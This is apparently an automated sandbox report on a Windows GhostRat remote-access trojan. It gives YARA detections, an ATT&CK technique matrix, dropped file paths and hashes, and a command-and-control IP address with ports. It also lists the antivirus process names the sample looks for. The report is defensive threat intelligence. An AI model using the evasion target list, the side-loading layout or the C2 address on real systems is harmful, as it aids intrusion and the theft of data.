Jump to behavior

Source: ShellExperienceHosts.exe	Binary or memory string: acs.exe
Source: ShellExperienceHosts.exe	Binary or memory string: vsserv.exe
Source: ShellExperienceHosts.exe	Binary or memory string: kxetray.exe
Source: ShellExperienceHosts.exe	Binary or memory string: avcenter.exe
Source: ShellExperienceHosts.exe	Binary or memory string: KSafeTray.exe
Source: ShellExperienceHosts.exe	Binary or memory string: cfp.exe
Source: ShellExperienceHosts.exe	Binary or memory string: avp.exe
Source: ShellExperienceHosts.exe	Binary or memory string: 360Safe.exe
Source: ShellExperienceHosts.exe	Binary or memory string: rtvscan.exe
Source: ShellExperienceHosts.exe	Binary or memory string: 360tray.exe
Source: ShellExperienceHosts.exe	Binary or memory string: ashDisp.exe
Source: ShellExperienceHosts.exe	Binary or memory string: TMBMSRV.exe
Source: ShellExperienceHosts.exe	Binary or memory string: 360Tray.exe
Source: ShellExperienceHosts.exe	Binary or memory string: avgwdsvc.exe
Source: ShellExperienceHosts.exe	Binary or memory string: AYAgent.aye
Source: ShellExperienceHosts.exe	Binary or memory string: QUHLPSVC.EXE
Source: ShellExperienceHosts.exe	Binary or memory string: RavMonD.exe
Source: ShellExperienceHosts.exe	Binary or memory string: Mcshield.exe
Source: ShellExperienceHosts.exe	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.30d1053.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.8925fb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.30d1053.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.2c305bf.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.32d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.2bf1004.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.8925fb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.447260b.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.2bf1004.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.2c305bf.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.447260b.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.32d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.2813277197.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535345010.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535217900.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2650603870.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3140566966.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535848822.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2650541111.000000000440D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2525280786.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3301816914.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2976737282.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2525280786.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2650541111.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3301718971.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2976790913.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2813511682.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3460158871.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3140624577.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3460049955.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535248901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ShellExperienceHosts.exe PID: 5780, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.30d1053.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.8925fb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.30d1053.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.2c305bf.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.32d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.2bf1004.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.8925fb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.447260b.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.2bf1004.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.2c305bf.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.447260b.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ShellExperienceHosts.exe.32d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ShellExperienceHosts.exe.447260b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.2813277197.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535345010.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535217900.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2650603870.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3140566966.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535848822.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2650541111.000000000440D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2525280786.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3301816914.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2976737282.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2525280786.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2650541111.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3301718971.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2976790913.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2813511682.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3460158871.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3140624577.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3460049955.0000000004471000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3535248901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ShellExperienceHosts.exe PID: 5780, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Replication Through Removable Media	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	141 Input Capture	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	222 Process Injection	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	141 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	28 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	222 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Indicator Removal	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PKHDJwnF0I.exe	55%	ReversingLabs	Win32.Trojan.DllHijack

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Bulete\AnyDesk.exe	0%	ReversingLabs
C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	0%	ReversingLabs
C:\Users\Public\Bulete\program\yyzyBase.dll	73%	ReversingLabs	Win32.Trojan.DllHijack
C:\Users\user\AppData\Local\Temp\backup.dll	73%	ReversingLabs	Win32.Trojan.DllHijack
C:\Users\user\AppData\Local\Temp\backup.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
156.251.17.243:17093	0%	Avira URL Cloud	safe
http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1	0%	Avira URL Cloud	safe
http://go.microsoftM	0%	Avira URL Cloud	safe
156.251.17.243:17094	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
156.251.17.243:17093	true	Avira URL Cloud: safe	unknown
156.251.17.243:17094	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000010.00000002.2533631431.0000000006243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1	powershell.exe, 00000010.00000002.2520600729.000000000332A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000010.00000002.2521861321.0000000005335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2521861321.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000010.00000002.2521861321.00000000051E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2522179924.0000000004651000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000010.00000002.2521861321.0000000005335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2521861321.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000010.00000002.2533631431.0000000006243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.microsoftM	powershell.exe, 00000010.00000002.2520600729.000000000332A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000010.00000002.2521861321.00000000051E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2522179924.0000000004651000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka..winsvr	powershell.exe, 00000011.00000002.2535753815.0000000006FB3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mi	powershell.exe, 00000010.00000002.2539232911.0000000007871000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
156.251.17.243	unknown	Seychelles		132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583832
Start date and time:	2025-01-03 17:16:50 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PKHDJwnF0I.exe renamed because original name is a hash value
Original Sample Name:	4F09BB774EC9135BE056F7329EB5BEA5.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@43/28@0/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 98% Number of executed functions: 114 Number of non-executed functions: 276
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target PKHDJwnF0I.exe, PID 6960 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1852 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6264 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: PKHDJwnF0I.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
156.251.17.243	8R2YjBA8nI.exe	Get hash	malicious	GhostRat	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	8R2YjBA8nI.exe	Get hash	malicious	GhostRat	Browse	156.251.17.243
	Hilix.ppc.elf	Get hash	malicious	Mirai	Browse	45.202.220.139
	Hilix.sh4.elf	Get hash	malicious	Mirai	Browse	45.202.220.141
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	vcimanagement.armv4l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.250.157.117
	vcimanagement.armv6l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.252.64.239
	vcimanagement.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.242.206.56
	vcimanagement.sh4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.253.238.131
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	154.216.83.124
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	154.216.83.138

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	S1Rv3ioghk.exe	Get hash	malicious	Unknown	Browse
	S1Rv3ioghk.exe	Get hash	malicious	Unknown	Browse
	TEKujpTgCK.exe	Get hash	malicious	Unknown	Browse
	TEKujpTgCK.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\Public\Bulete\AnyDesk.exe

Download File

Process:	C:\Users\user\Desktop\PKHDJwnF0I.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993864
Entropy (8bit):	7.999385068938963
Encrypted:	true
SSDEEP:	49152:meqV5ZTNR7GCogeeQO+f2roC8b9vIT2jDKW4q8TrdzRplNOBLE7Rm1ebw4Tf/Eex:cX1T7bL0KrCqKDV4Jnd1ZOQ7R3rr/f6K
MD5:	ECAE8B9C820CE255108F6050C26C37A1
SHA1:	42333349841DDCEC2B5C073ABC0CAE651BB03E5F
SHA-256:	1A70F4EEF11FBECB721B9BAB1C9FF43A8C4CD7B2CAFEF08C033C77070C6FE069
SHA-512:	9DC317682D4A89351E876B47F57E7FD26176F054B7322433C2C02DD074AABF8BFB19E6D1137A4B3EE6CD3463EAF8C0DE124385928C561BDFE38440F336035ED4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........h.}.;.}.;.}.;..";.}.;..#;.}.;...;.}.;...;.}.;Rich.}.;........................PE..L......f.........."..........K..............@....@...........................J.......M...@...........................................J.PH............K.HQ....J......................................................................................text...w(......................... ..`.itext.......@...........................rdata..............................@..@.data...ddK.. ...bK..2..............@....rsrc...PH....J..J....K.............@..@.reloc........J.......K.............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Bulete\program\IOVAS

Download File

Process:	C:\Users\user\Desktop\PKHDJwnF0I.exe
File Type:	openssl enc'd data with salted password, base64 encoded
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.834209459448048
Encrypted:	false
SSDEEP:	3:iqkGLZQMvor8d+WKLBdY:ilGLCMnQW4Y
MD5:	01C30A35D354DE7F552782E8AD033F6F
SHA1:	70C549DB0A46C347C678E37D4DC955C667F6698F
SHA-256:	0D597D876B86794420368E0405C7FB91A06CA1FB6B8A02989D4D097CA5F6E2E9
SHA-512:	9A7F05524AC2E8C9E59F915ADE0F09D43EC95140C09972134F9A77B91037B59B42C38C15B534D179579500B51ADF607BCEE559A487509C73AEE29CDB3218F66F
Malicious:	false
Preview:	U2FsdGVkX19RaGCKYdGJjgam0iOa0pR2ghsysoE+aM8=

C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Download File

Process:	C:\Users\user\Desktop\PKHDJwnF0I.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	649416
Entropy (8bit):	6.182028963232553
Encrypted:	false
SSDEEP:	12288:zohLz8nnnnntnnnnnnnnnnnnnnnxnMvnnnnPZnnnnPxnnnnnnnnqshJSLnk41mCL:zshQmC5Bz5CLgBFqGI1yi/UQeZndsqro
MD5:	0922B22053A6D5D9516EA910D34A4771
SHA1:	784D3ED35D040091AE209792E2FA8FC97EE6A071
SHA-256:	41F413DEBFE785B95D852A396AEFE1C814F3C13BDEDF85526F2DC4E83127D6CA
SHA-512:	909EC8B2C1045CC11C03C6B82B7ED6AD96BC8E93F9C98CB8A668572C84CBBCE778C12365B2B2EB547218783A830BE41458E0AE21939E99339F54921D98D944D8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: S1Rv3ioghk.exe, Detection: malicious, Browse Filename: S1Rv3ioghk.exe, Detection: malicious, Browse Filename: TEKujpTgCK.exe, Detection: malicious, Browse Filename: TEKujpTgCK.exe, Detection: malicious, Browse
